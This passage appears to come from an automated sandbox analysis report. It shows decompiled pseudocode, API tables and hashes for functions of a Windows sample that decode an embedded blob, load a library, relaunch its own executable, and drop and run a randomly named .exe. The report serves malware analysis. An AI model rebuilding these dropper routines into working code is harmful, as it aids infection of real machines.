				 *((intOrPtr*)(_t191 - 0x1e8)) = 0xaaf7674b;
				 *((intOrPtr*)(_t191 - 0x1e4)) = 0x3fd813b0;
				 *((intOrPtr*)(_t191 - 0x1e0)) = 0x60beee96;
				 *((intOrPtr*)(_t191 - 0x1dc)) = 0x9781008e;
				 *((intOrPtr*)(_t191 - 0x1d8)) = 0x4aa3e6d3;
				 *((intOrPtr*)(_t191 - 0x1d4)) = 0x16cff405;
				 *((intOrPtr*)(_t191 - 0x1d0)) = 0xc7cd086c;
				 *((intOrPtr*)(_t191 - 0x1cc)) = 0x7fa1c49;
				 *((intOrPtr*)(_t191 - 0x1c8)) = 0xf2da8f0b;
				 *((intOrPtr*)(_t191 - 0x1c4)) = 0x5a45cf8b;
				 *((intOrPtr*)(_t191 - 0x1c0)) = 0x3a9cda52;
				 *((intOrPtr*)(_t191 - 0x1bc)) = 0x320d7194;
				 *((intOrPtr*)(_t191 - 0x1b8)) = 0x5736192c;
				 *((intOrPtr*)(_t191 - 0x1b4)) = 0xd8ce2db8;
				 *((intOrPtr*)(_t191 - 0x1b0)) = 0x1de4ee69;
				 *((intOrPtr*)(_t191 - 0x1ac)) = 0xe8ae66c8;
				 *((intOrPtr*)(_t191 - 0x1a8)) = 0x2c44325f;
				 *((intOrPtr*)(_t191 - 0x1a4)) = 0xed6ce4a8;
				 *((intOrPtr*)(_t191 - 0x1a0)) = 0x82bd0342;
				 *((intOrPtr*)(_t191 - 0x19c)) = 0x225078dd;
				 *((intOrPtr*)(_t191 - 0x198)) = 0x69abbb87;
				 *((intOrPtr*)(_t191 - 0x194)) = 0xa9d4ed32;
				 *((intOrPtr*)(_t191 - 0x190)) = 0x8050fb55;
				 *((intOrPtr*)(_t191 - 0x18c)) = 0x39db400e;
				 *((intOrPtr*)(_t191 - 0x188)) = 0x11b86bf1;
				 *((intOrPtr*)(_t191 - 0x184)) = 0xff2e0d55;
				 *((intOrPtr*)(_t191 - 0x180)) = 0x905b27a0;
				 *((intOrPtr*)(_t191 - 0x17c)) = 0xa6cc43d0;
				 *((intOrPtr*)(_t191 - 0x178)) = 0x248399f0;
				 *((intOrPtr*)(_t191 - 0x174)) = 0x61fdc396;
				 *((intOrPtr*)(_t191 - 0x170)) = 0x55d41932;
				 *((intOrPtr*)(_t191 - 0x16c)) = 0x3cb6d6d2;
				 *((intOrPtr*)(_t191 - 0x168)) = 0x602f81fc;
				 *((intOrPtr*)(_t191 - 0x164)) = 0x96fe0e2a;
				 *((intOrPtr*)(_t191 - 0x160)) = 0xadb4daa8;
				 *((intOrPtr*)(_t191 - 0x15c)) = 0x4ba1d5c1;
				 *((intOrPtr*)(_t191 - 0x158)) = 0xaeb36b38;
				 *((intOrPtr*)(_t191 - 0x154)) = 0x94d0b9c4;
				 *((intOrPtr*)(_t191 - 0x150)) = 0x442d53bf;
				 *((intOrPtr*)(_t191 - 0x14c)) = 0x3293833a;
				 *((intOrPtr*)(_t191 - 0x148)) = 0xb37bca59;
				 *((intOrPtr*)(_t191 - 0x144)) = 0x8c41f99d;
				 *((intOrPtr*)(_t191 - 0x140)) = 0x7af39d97;
				 *((intOrPtr*)(_t191 - 0x13c)) = 0x6cfa7f9a;
				 *((intOrPtr*)(_t191 - 0x138)) = 0xb2cb25cc;
				 *((intOrPtr*)(_t191 - 0x134)) = 0xb742fb49;
				 *((intOrPtr*)(_t191 - 0x130)) = 0x9e19e072;
				 *((intOrPtr*)(_t191 - 0x12c)) = 0x7435f9d3;
				 *((intOrPtr*)(_t191 - 0x128)) = 0x6151d2d;
				 *((intOrPtr*)(_t191 - 0x124)) = 0xb8c81b4e;
				 *((intOrPtr*)(_t191 - 0x120)) = 0xa0a74801;
				 *((intOrPtr*)(_t191 - 0x11c)) = 0x9254b144;
				 *((intOrPtr*)(_t191 - 0x118)) = 0xbf9a9ef;
				 *((intOrPtr*)(_t191 - 0x114)) = 0x664eea5e;
				 *((intOrPtr*)(_t191 - 0x110)) = 0xef5c68d3;
				 *((intOrPtr*)(_t191 - 0x10c)) = 0x663adb83;
				 *((intOrPtr*)(_t191 - 0x108)) = 0x698be370;
				 *((intOrPtr*)(_t191 - 0x104)) = 0xc6ab9f43;
				 *((intOrPtr*)(_t191 - 0x100)) = 0x2cb41cee;
				 *((intOrPtr*)(_t191 - 0xfc)) = 0x47d7bebb;
				 *((intOrPtr*)(_t191 - 0xf8)) = 0x33a7852f;
				 *((intOrPtr*)(_t191 - 0xf4)) = 0xa1c5614b;
				 *((intOrPtr*)(_t191 - 0xf0)) = 0xa7986281;
				 *((intOrPtr*)(_t191 - 0xec)) = 0xd5f1e78;
				 *((intOrPtr*)(_t191 - 0xe8)) = 0x394359d2;
				 *((intOrPtr*)(_t191 - 0xe4)) = 0x63aa5408;
				 *((intOrPtr*)(_t191 - 0xe0)) = 0x882305a9;
				 *((intOrPtr*)(_t191 - 0xdc)) = 0x4db9286a;
				 *((intOrPtr*)(_t191 - 0xd8)) = 0x628bddce;
				 *((intOrPtr*)(_t191 - 0xd4)) = 0x711914d8;
				 *((intOrPtr*)(_t191 - 0xd0)) = 0x69e7934f;
				 *((intOrPtr*)(_t191 - 0xcc)) = 0x38cb7c62;
				 *((intOrPtr*)(_t191 - 0xc8)) = 0xff47d5d8;
				 *((intOrPtr*)(_t191 - 0xc4)) = 0xe66607e0;
				 *((intOrPtr*)(_t191 - 0xc0)) = 0xffbe9a31;
				 *((intOrPtr*)(_t191 - 0xbc)) = 0xde0936dc;
				 *((intOrPtr*)(_t191 - 0xb8)) = 0xeeb91249;
				 *((intOrPtr*)(_t191 - 0xb4)) = 0x9a91cfec;
				 *((intOrPtr*)(_t191 - 0xb0)) = 0xd97b090f;
				 *((intOrPtr*)(_t191 - 0xac)) = 0x79e7a3b3;
				 *((intOrPtr*)(_t191 - 0xa8)) = 0xbf85e88a;
				 *((intOrPtr*)(_t191 - 0xa4)) = 0xd17b9713;
				 *((intOrPtr*)(_t191 - 0xa0)) = 0xb4a963a5;
				 *((intOrPtr*)(_t191 - 0x9c)) = 0x4e9dab1f;
				 *((intOrPtr*)(_t191 - 0x98)) = 0x26103dda;
				 *((intOrPtr*)(_t191 - 0x94)) = 0xcb4184e7;
				 *((intOrPtr*)(_t191 - 0x90)) = 0x29b9d4c3;
				 *((intOrPtr*)(_t191 - 0x8c)) = 0xb84826d1;
				 *((intOrPtr*)(_t191 - 0x88)) = 0x6691dcdb;
				 *((intOrPtr*)(_t191 - 0x84)) = 0xe77f285d;
				 *((intOrPtr*)(_t191 - 0x80)) = 0x63d37a01;
				 *((intOrPtr*)(_t191 - 0x7c)) = 0x9e07cefa;
				 *((intOrPtr*)(_t191 - 0x78)) = 0x8e456f03;
				 *((intOrPtr*)(_t191 - 0x74)) = 0xb191b1bc;
				 *((intOrPtr*)(_t191 - 0x70)) = 0xcdf1ff21;
				 *((intOrPtr*)(_t191 - 0x6c)) = 0xd53f95c1;
				 *((intOrPtr*)(_t191 - 0x68)) = 0xaed19769;
				 *((intOrPtr*)(_t191 - 0x64)) = 0x515166c1;
				 *((intOrPtr*)(_t191 - 0x60)) = 0xc4604900;
				 *((intOrPtr*)(_t191 - 0x5c)) = 0x7177c0f;
				 *((intOrPtr*)(_t191 - 0x58)) = 0xd6b03116;
				 *((intOrPtr*)(_t191 - 0x54)) = 0x48b81b3c;
				 *((intOrPtr*)(_t191 - 0x50)) = 0x7655b9b3;
				 *((intOrPtr*)(_t191 - 0x4c)) = 0x4c63c822;
				 *((intOrPtr*)(_t191 - 0x48)) = 0xdca9b450;
				 *((intOrPtr*)(_t191 - 0x44)) = 0x6562079a;
				 *((intOrPtr*)(_t191 - 0x40)) = 0xa503842e;
				 *((intOrPtr*)(_t191 - 0x3c)) = 0x97063634;
				 *((intOrPtr*)(_t191 - 0x38)) = 0xc165b32d;
				 *((intOrPtr*)(_t191 - 0x34)) = 0xbf230fad;
				 *((intOrPtr*)(_t191 - 0x30)) = 0x9b847890;
				 *((intOrPtr*)(_t191 - 0x2c)) = 0xa38ce9b0;
				 *((intOrPtr*)(_t191 - 0x28)) = 0xbae45a57;
				 *((intOrPtr*)(_t191 - 0x24)) = 0x39c26e65;
				 *((intOrPtr*)(_t191 - 0x20)) = 0x80e13151;
				 *((intOrPtr*)(_t191 - 0x1c)) = 0x4144edc3;
				 *((intOrPtr*)(_t191 - 0x18)) = 0xe2df436;
				 *((intOrPtr*)(_t191 - 0x14)) = 0x427bdf71;
				 *((intOrPtr*)(_t191 - 0x10)) = 0x8f267d87;
				 *((intOrPtr*)(_t191 - 0xc)) = 0x4d61d3e0;
				 *((intOrPtr*)(_t191 - 8)) = 0x6121230c;
				 *((intOrPtr*)(_t191 - 4)) = 0x766caa2a;
				_t189 = L00401D00(0x413930, 0x1f0, _t187);
				 *0x417c80 = LoadLibraryW(_t189);
				_t180 = HeapFree(GetProcessHeap(), 0, _t189);
				_t184 =  *0x417c80;
				_t190 = 0x1f5c6a;
				if( *0x417c80 != 0) {
					goto 0x42175c;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return L00401480(_t182, _t184, _t191 - 0x2bc, _t187, _t190);
				} else {
					goto 0x421749;
					return _t180;
				}
			}

0x0040843a
0x00408444
0x0040844e
0x00408458
0x00408462
0x0040846c
0x00408476
0x00408480
0x0040848a
0x00408494
0x0040849e
0x004084a8
0x004084b2
0x004084bc
0x004084c6
0x004084d0
0x004084da
0x004084e4
0x004084ee
0x004084f8
0x00408502
0x0040850c
0x00408516
0x00408520
0x0040852a
0x00408534
0x0040853e
0x00408548
0x00408552
0x0040855c
0x00408566
0x00408570
0x0040857a
0x00408584
0x0040858e
0x00408598
0x004085a2
0x004085ac
0x004085b6
0x004085c0
0x004085ca
0x004085d4
0x004085de
0x004085e8
0x004085f2
0x004085fc
0x00408606
0x00408610
0x0040861a
0x00408624
0x0040862e
0x00408638
0x00408642
0x0040864c
0x00408656
0x00408660
0x0040866a
0x00408674
0x0040867e
0x00408688
0x00408692
0x0040869c
0x004086a6
0x004086b0
0x004086ba
0x004086c4
0x004086ce
0x004086d8
0x004086e2
0x004086ec
0x004086f6
0x00408700
0x0040870a
0x00408714
0x0040871e
0x00408728
0x00408732
0x0040873c
0x00408746
0x00408750
0x0040875a
0x00408764
0x0040876e
0x00408778
0x00408782
0x0040878c
0x00408796
0x004087a0
0x004087aa
0x004087b4
0x004087be
0x004087c8
0x004087d2
0x004087dc
0x004087e6
0x004087f0
0x004087fa
0x00408804
0x0040880e
0x00408818
0x00408822
0x0040882c
0x00408836
0x00408840
0x0040884a
0x00408854
0x0040885e
0x00408868
0x00408872
0x0040887c
0x00408886
0x00408890
0x0040889a
0x004088a4
0x004088ae
0x004088b8
0x004088c2
0x004088cc
0x004088d6
0x004088e0
0x004088ea
0x004088f4
0x004088fe
0x00408908
0x00408912
0x0040891c
0x00408926
0x00408930
0x0040893a
0x00408944
0x0040894e
0x00408958
0x00408962
0x0040896c
0x00408976
0x00408980
0x0040898a
0x00408994
0x0040899e
0x004089a8
0x004089b2
0x004089bc
0x004089c6
0x004089d0
0x004089d7
0x004089de
0x004089e5
0x004089ec
0x004089f3
0x004089fa
0x00408a01
0x00408a08
0x00408a0f
0x00408a16
0x00408a1d
0x00408a24
0x00408a2b
0x00408a32
0x00408a39
0x00408a40
0x00408a47
0x00408a58
0x00408a64
0x00408a6b
0x00408a72
0x00408a79
0x00408a80
0x00408a87
0x00408a8e
0x00408a95
0x00408a9c
0x00408aa3
0x00408aaa
0x00408ab1
0x00408ab8
0x00408ac7
0x00408ad3
0x00408adf
0x00408ae5
0x00408aeb
0x00408aee
0x00408af6
0x00408afb
0x00408afc
0x00408afd
0x00408afe
0x00408aff
0x00408b00
0x00408b01
0x00408b02
0x00408b03
0x00408b04
0x00408b16
0x00408af0
0x00408af0
0x00408af5
0x00408af5

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00408ACA
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00408AD8
HeapFree.KERNEL32(00000000), ref: 00408ADF

Strings

!, xrefs: 004084B2
_2D,, xrefs: 004086EC
09A, xrefs: 00408A5F
^Nf, xrefs: 0040885E

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$FreeLibraryLoadProcess
String ID: !$09A$^Nf$_2D,
API String ID: 872250060-3413394137
Opcode ID: 603724e8e79f02a32d2db4832256dba5e9d348b7fd537261ec3cf1f44600692e
Instruction ID: 55b9f49b526435ef4ac45ca8ec7e4e969a54f550165783a9cbdfb722529061b6
Opcode Fuzzy Hash: 603724e8e79f02a32d2db4832256dba5e9d348b7fd537261ec3cf1f44600692e
Instruction Fuzzy Hash: 22E1B7B4C1636DCBDB60DF829A897CDBB70BB16300F6086C9C5993A314CB750A86CF85

Uniqueness

Uniqueness Score: 100.00%

Function 0040CEB9, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 56memoryCOMMON

APIs

_snwprintf.NTDLL ref: 0040CED3
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040CEDF
HeapFree.KERNEL32(00000000), ref: 0040CEE6
memset.NTDLL ref: 0040CEF4
GetModuleHandleW.KERNEL32(00000000), ref: 0040CF1D
GetModuleHandleW.KERNEL32(00000000,00000000), ref: 0040CF3D

Strings

0, xrefs: 0040CEFD

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: HandleHeapModule$FreeProcess_snwprintfmemset
String ID: 0
API String ID: 3347792686-4108050209
Opcode ID: 31124bc13e8cec13d6f46a7ec77a2f19ccfc3542d7088b5fc8a405401d518ca5
Instruction ID: a30b285e1d5ccb893b3057d7b3320b0ba06e4e9b916a02992a5c36ad61ff7d8d
Opcode Fuzzy Hash: 31124bc13e8cec13d6f46a7ec77a2f19ccfc3542d7088b5fc8a405401d518ca5
Instruction Fuzzy Hash: 32114CB5A50214FBEB209BE0EC09FEE7A78BB44745F244066F609B61D0D7746144CB6E

Uniqueness

Uniqueness Score: 7.75%

Function 004024E9, Relevance: 12.1, APIs: 8, Instructions: 59
memorystringCOMMON

C-Code - Quality: 30%

			E004024E9(void* __ebx, int __edi, intOrPtr* __esi) {
				int _t20;
				short* _t23;
				void* _t24;
				void* _t39;
				void* _t42;
				void* _t43;
				long* _t44;
				int _t46;
				signed int _t48;
				intOrPtr* _t49;
				void* _t51;
				long _t52;
				WCHAR* _t54;
				void* _t55;

				_t49 = __esi;
				_t46 = __edi;
				_t39 = __ebx;
				do {
					_t1 = _t49 + 4; // 0x4
					_t20 = lstrlenW(_t1);
					_t49 =  *_t49;
					_t39 = _t39 + 1 + _t20;
				} while (_t49 != 0);
				_t23 = RtlAllocateHeap(GetProcessHeap(), 8, _t39 + _t39);
				 *(_t55 - 4) = _t23;
				if(_t23 == 0) {
					_t46 =  *(_t55 - 0xc);
				} else {
					_t42 =  *(_t55 - 8);
					while(_t42 != 0) {
						_t5 = _t42 + 4; // 0x4
						_t54 = _t5;
						lstrcpyW( &(_t23[_t46]), _t54);
						_t48 = _t46 + lstrlenW(_t54);
						_t23 =  *(_t55 - 4);
						_t23[_t48] = 0x2c;
						_t46 = _t48 + 1;
						_t42 =  *_t42;
					}
					_t43 = 0;
					_t52 = WideCharToMultiByte(0xfde9, 0, _t23, _t46, 0, 0, 0, 0);
					 *(_t55 - 0x14) = _t52;
					if(_t52 != 0) {
						_t43 = RtlAllocateHeap(GetProcessHeap(), 8, _t52);
						if(_t43 == 0) {
							goto L10;
						} else {
							goto 0x420916;
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							WideCharToMultiByte();
							_t44 =  *(_t55 - 0x10);
							if(_t44 != 0) {
								 *_t44 =  *(_t55 - 0x14);
							}
						}
					}
					goto 0x420936;
					asm("int3");
					 *_t46 = _t43;
					HeapFree(GetProcessHeap(), ??, ??);
				}
				_t24 =  *(_t55 - 8);
				if(_t24 != 0) {
					do {
						_t51 =  *_t24;
						HeapFree(GetProcessHeap(), 0, _t24);
						_t24 = _t51;
					} while (_t51 != 0);
				}
				return 0 |  *_t46 != 0x00000000;
			}

0x004024e9
0x004024e9
0x004024e9
0x004024f0
0x004024f0
0x004024f4
0x004024fa
0x004024fd
0x004024ff
0x00402510
0x00402516
0x0040251b
0x004025c5
0x00402521
0x00402521
0x00402526
0x00402528
0x00402528
0x00402530
0x0040253d
0x00402544
0x00402547
0x0040254b
0x0040254c
0x0040254e
0x00402552
0x00402566
0x00402568
0x0040256d
0x0040257f
0x00402583
0x00000000
0x00402585
0x00402585
0x0040258a
0x0040258b
0x0040258c
0x0040258d
0x0040258e
0x0040258f
0x00402590
0x00402591
0x00402592
0x00402593
0x00402594
0x00402595
0x00402596
0x00402597
0x0040259d
0x004025a2
0x004025a7
0x004025a7
0x004025a2
0x00402583
0x004025ae
0x004025b3
0x004025b4
0x004025bd
0x004025bd
0x004025c8
0x004025cd
0x004025d0
0x004025d0
0x004025dc
0x004025e2
0x004025e4
0x004025d0
0x004025f5

APIs

lstrlenW.KERNEL32(00000004), ref: 004024F4
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00402509
RtlAllocateHeap.NTDLL(00000000), ref: 00402510
lstrcpyW.KERNEL32(00000000,00000004), ref: 00402530
lstrlenW.KERNEL32(00000004), ref: 00402537
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402560
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00402572
RtlAllocateHeap.NTDLL(00000000), ref: 00402579
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004025D5
HeapFree.KERNEL32(00000000), ref: 004025DC

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$Process$Allocatelstrlen$ByteCharFreeMultiWidelstrcpy
String ID:
API String ID: 3825671978-0
Opcode ID: 0ea816678f47aa9c1af7ca755f957be96d3d2161154b0cdfd2d5dd9c0ba66894
Instruction ID: f6f61e4aec002960680c96b14b785493cf4c8b84aa0100ec50c14699d9e46075
Opcode Fuzzy Hash: 0ea816678f47aa9c1af7ca755f957be96d3d2161154b0cdfd2d5dd9c0ba66894
Instruction Fuzzy Hash: E5118F71901715EFDB209FE0DCD8AAB77ACEF48744F044475AA01E7281DB78DD048BA9

Uniqueness

Uniqueness Score: 1.85%

Function 00410500, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
memorysynchronizationUNIQUE

C-Code - Quality: 79%

			E00410500() {
				void* _t7;
				int _t8;
				void* _t18;
				void* _t19;

				_t19 =  *0x416d5c;
				_t18 = 0x416d5c;
				if(_t19 != 0) {
					do {
						_t8 =  *(_t19 + 8);
						if(_t8 == 1 || _t8 == 2) {
						}
						if(_t8 != 3) {
							L8:
							if(0 == 0) {
								_t18 = _t19;
								goto L11;
							}
							goto L9;
						} else {
							_t8 = WaitForSingleObject( *(_t19 + 0x14), 0);
							if(_t8 != 0) {
								goto L8;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t19 + 0x10))))( *(_t19 + 0xc), _t8, _t8);
							VirtualFree( *(_t19 + 0xc), 0, 0x8000);
							CloseHandle( *(_t19 + 0x14));
							L9:
							 *_t18 =  *_t19;
							_t8 = HeapFree(GetProcessHeap(), 0, _t19);
						}
						L11:
						_t19 =  *_t18;
					} while (_t19 != 0);
					return _t8;
				}
				return _t7;
			}

0x00410501
0x00410508
0x0041050f
0x00410512
0x00410512
0x0041051a
0x0041051a
0x00410529
0x0041055f
0x00410561
0x00410579
0x00000000
0x00410579
0x00000000
0x0041052b
0x00410530
0x00410538
0x00000000
0x00000000
0x00410542
0x0041054e
0x00410557
0x00410563
0x00410568
0x00410571
0x00410571
0x0041057b
0x0041057b
0x0041057d
0x00000000
0x00410581
0x00410584

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 00410530
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0041054E
CloseHandle.KERNEL32(?), ref: 00410557
GetProcessHeap.KERNEL32(00000000,?), ref: 0041056A
HeapFree.KERNEL32(00000000), ref: 00410571

Strings

\mA, xrefs: 00410508

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
String ID: \mA
API String ID: 797926041-1265592874
Opcode ID: d3d24ef5832bb3194ad2f27323886dec7f8ba0b7c65cfc02b6cd6f692b673f14
Instruction ID: 71fd7fea39d91afa21b32e6af605be952dd7d841e9f0efcdea2afb4782ebad69
Opcode Fuzzy Hash: d3d24ef5832bb3194ad2f27323886dec7f8ba0b7c65cfc02b6cd6f692b673f14
Instruction Fuzzy Hash: 00014031600610EBDB308B59EC44BA777BAEF44711B258527E942D7260C7A5ECC09F58

Uniqueness

Uniqueness Score: 100.00%

Function 0040FEF1, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
memorystringUNIQUE

C-Code - Quality: 56%

			E0040FEF1(void* __ecx, void* __edi, void* __esi, void* __eflags) {
				int _t16;
				int _t21;
				void* _t25;
				void* _t30;
				void* _t32;
				void* _t35;
				void* _t44;

				_t44 = __eflags;
				_t30 = __edi;
				_t25 = __ecx;
				memset(??, ??, ??);
				GetModuleFileNameW(0, 0x4183f8, 0x104);
				_push(_t25);
				_t32 = L00401C60(0x414360, 0x2f8, __esi);
				_t29 = _t32;
				L0040F610(0x417cd0, _t32);
				E0040F6F0(HeapFree(GetProcessHeap(), 0, _t32), _t32, _t30, _t32);
				L0040F900(L0040F870(), _t32);
				L0040F770(0x417cd0, _t32, _t32, _t44);
				_t16 = lstrcmpiW(0x4183f8, 0x417ee0);
				if(_t16 != 0) {
					L0040FB80(0x417cd0);
					__eflags =  *0x4163cc;
					if( *0x4163cc == 0) {
						goto 0x421ede;
						asm("int3");
						asm("int3");
						asm("int3");
						memset();
						 *(_t35 - 0x58) = 0x44;
						_t21 = CreateProcessW(0x417ee0, 0, 0, 0, 0, 0, 0, 0, _t35 - 0x58, _t35 - 0x10);
						__eflags = _t21;
						if(_t21 != 0) {
							CloseHandle( *(_t35 - 0x10));
							_t21 = CloseHandle( *(_t35 - 0xc));
						}
						goto 0x421ef4;
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						return _t21;
					} else {
						L0040FD90(0x417cd0, _t29, _t32);
						return 1;
					}
				} else {
					return _t16;
				}
			}

0x0040fef1
0x0040fef1
0x0040fef1
0x0040fef1
0x0040ff06
0x0040ff0c
0x0040ff1f
0x0040ff21
0x0040ff28
0x0040ff3d
0x0040ff47
0x0040ff4c
0x0040ff5b
0x0040ff63
0x0040ff6a
0x0040ff6f
0x0040ff76
0x0040ff87
0x0040ff8c
0x0040ff8d
0x0040ff8e
0x0040ff8f
0x0040ff98
0x0040ffba
0x0040ffc0
0x0040ffc2
0x0040ffc7
0x0040ffd0
0x0040ffd0
0x0040ffd6
0x0040ffdb
0x0040ffdc
0x0040ffdd
0x0040ffde
0x0040ffdf
0x0040ff78
0x0040ff78
0x0040ff86
0x0040ff86
0x0040ff65
0x0040ff69
0x0040ff69

APIs

memset.NTDLL ref: 0040FEF1
GetModuleFileNameW.KERNEL32(00000000,004183F8,00000104), ref: 0040FF06
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040FF30
HeapFree.KERNEL32(00000000), ref: 0040FF37
lstrcmpiW.KERNEL32(004183F8,00417EE0), ref: 0040FF5B

Strings

`CA, xrefs: 0040FF12

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: Heap$FileFreeModuleNameProcesslstrcmpimemset
String ID: `CA
API String ID: 1471024059-1830387698
Opcode ID: 68f2428d77397bb74e6884e8fff542c1b2a82d377bbf8de1dddb0b012062ba0b
Instruction ID: 4502d6da440700db5f5c97b861d9704aef90190e012679a78fe4f98c9298ac4f
Opcode Fuzzy Hash: 68f2428d77397bb74e6884e8fff542c1b2a82d377bbf8de1dddb0b012062ba0b
Instruction Fuzzy Hash: 33F0F471744204A7C63037F5BC0F7EA32649B8474AF14407BF809B59D2DE7E449846AF

Uniqueness

Uniqueness Score: 100.00%

Function 00410017, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
stringfileCOMMON

C-Code - Quality: 29%

			E00410017(WCHAR* __eax, intOrPtr __ecx, intOrPtr __edx) {
				int _t35;
				int _t36;
				intOrPtr _t42;
				signed int _t48;
				signed int _t49;
				signed int _t50;
				void* _t51;
				void* _t54;
				void* _t56;

				 *((intOrPtr*)(_t56 - 8)) = __ecx;
				_t42 = __edx;
				lstrcpyW(__eax, ??);
				_t48 = lstrlenW(_t56 - 0x268);
				 *((short*)(_t56 + _t48 * 2 - 0x268)) = 0x5c;
				_t49 = _t48 + 1;
				_t54 = (GetTickCount() & 0x0000000f) + 4;
				L00401FD0( &((_t56 - 0x268)[_t49]), _t54);
				 *((intOrPtr*)(_t56 - 4)) = _t42;
				_t50 = _t49 + _t54;
				 *((intOrPtr*)(_t56 + _t50 * 2 - 0x268)) = 0x65002e;
				 *((intOrPtr*)(_t56 + _t50 * 2 - 0x264)) = 0x650078;
				 *((short*)(_t56 + _t50 * 2 - 0x260)) = 0;
				_t35 = CreateFileW(_t56 - 0x268, 0x40000000, 0, 0, 2, 0x80, 0);
				_t51 = _t35;
				if(_t51 != 0xffffffff) {
					goto 0x421f30;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t36 = WriteFile();
					_t35 = CloseHandle(_t51);
					if(_t36 != 0) {
						goto 0x421f4b;
						asm("int3");
						asm("int3");
						asm("int3");
						memset();
						 *(_t56 - 0x60) = 0x44;
						_t35 = CreateProcessW(_t56 - 0x268, 0, 0, 0, 0, 0, 0, 0, _t56 - 0x60, _t56 - 0x18);
						if(_t35 != 0) {
							CloseHandle( *(_t56 - 0x18));
							_t35 = CloseHandle( *(_t56 - 0x14));
						}
					}
				}
				goto 0x421f61;
				asm("int3");
				return _t35;
			}

0x00410017
0x0041001b
0x0041001d
0x00410030
0x00410037
0x0041003f
0x00410054
0x00410059
0x00410060
0x00410069
0x0041006f
0x0041007a
0x00410085
0x00410099
0x0041009f
0x004100a4
0x004100a6
0x004100ab
0x004100ac
0x004100ad
0x004100ae
0x004100af
0x004100b0
0x004100b1
0x004100b2
0x004100b3
0x004100bc
0x004100c4
0x004100c6
0x004100cb
0x004100cc
0x004100cd
0x004100ce
0x004100d7
0x004100fb
0x00410103
0x00410108
0x00410111
0x00410111
0x00410103
0x004100c4
0x00410117
0x0041011c
0x0041011d

APIs

lstrcpyW.KERNEL32 ref: 0041001D
lstrlenW.KERNEL32(?), ref: 0041002A
GetTickCount.KERNEL32 ref: 00410040
CreateFileW.KERNEL32(0065002E,40000000), ref: 00410099

Strings

x, xrefs: 0041007A
., xrefs: 0041006F

Memory Dump Source

Source File: 00000006.00000002.1665373163.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1665369399.00400000.00000004.sdmp Download File
Associated: 00000006.00000002.1665385810.00411000.00000002.sdmp Download File
Associated: 00000006.00000002.1665390063.00412000.00000004.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_810.jbxd

Similarity

API ID: CountCreateFileTicklstrcpylstrlen
String ID: .$x
API String ID: 3921185036-1654958672
Opcode ID: adf9aeb8d81d4a57a789fc05e7957f3f01c5152ad96989f355c375cae0570457
Instruction ID: 768f20da8c2c7e1c6d09734f6fc3490fd2959f3cd212950113396c9d9d15df33
Opcode Fuzzy Hash: adf9aeb8d81d4a57a789fc05e7957f3f01c5152ad96989f355c375cae0570457
Instruction Fuzzy Hash: F401F771904618EFD760CFA0DC4CBEE3664AB44344F144276E80AD32A0DF358D45CB84

Uniqueness

Uniqueness Score: 3.75%

Function 00410489, Relevance: 9.0, APIs: 6, Instructions: 31
memoryCOMMON

